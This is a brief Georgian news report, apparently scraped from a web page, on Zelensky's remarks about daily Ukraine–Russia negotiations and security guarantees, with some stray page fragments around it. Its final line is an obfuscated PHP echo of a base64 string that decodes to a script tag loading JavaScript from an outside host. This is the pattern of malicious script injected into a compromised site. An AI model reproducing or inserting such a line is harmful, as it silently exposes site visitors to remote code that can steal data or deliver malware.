celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ განაცხადა, რომ უკრაინული დელეგაციის წევრები რუსეთთან ყოველდღიურ მოლაპარაკებებს აწარმოებენ. დელეგაციის წევრებს მკაფიო ამოცანა აქვთ - ყველაფერი გაკეთდეს იმისათვის, რომ პრეზიდენტების შეხვედრა შედგეს.
 
„შეხვედრა, რომელსაც დარწმუნებული ვარ, ხალხი მოუთმენლად ელის. ცხადია, ეს რთული ამბავია. რთული გზაა, მაგრამ საჭირო და ჩვენი მიზანია, რომ უკრაინამ ამ ბრძოლაში, ამ რთულ მოლაპარაკებებში აუცილებელი შედეგი მიიღოს. აუცილებელი ჩვენთვის, მშვიდობისა და უსაფრთხოებისთვის. იმისთვის, რომ გარანტიები გვქონდეს - ნორმალური, ეფექტური. არა ისეთი, როგორიც ბუდაპეშტში იყო ან ისეთი, როგორიც ჩვენი ქვეყნის ცის ჩაკეტვის საკითხია. მიღებულ შედეგებზე უკრაინელებს უნდა შეეძლოთ იმის თქმა, რომ ეს მუშაობს და გარანტიებიც ნამდვილია,“- აღნიშნა ზელენსკიმ.
761
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");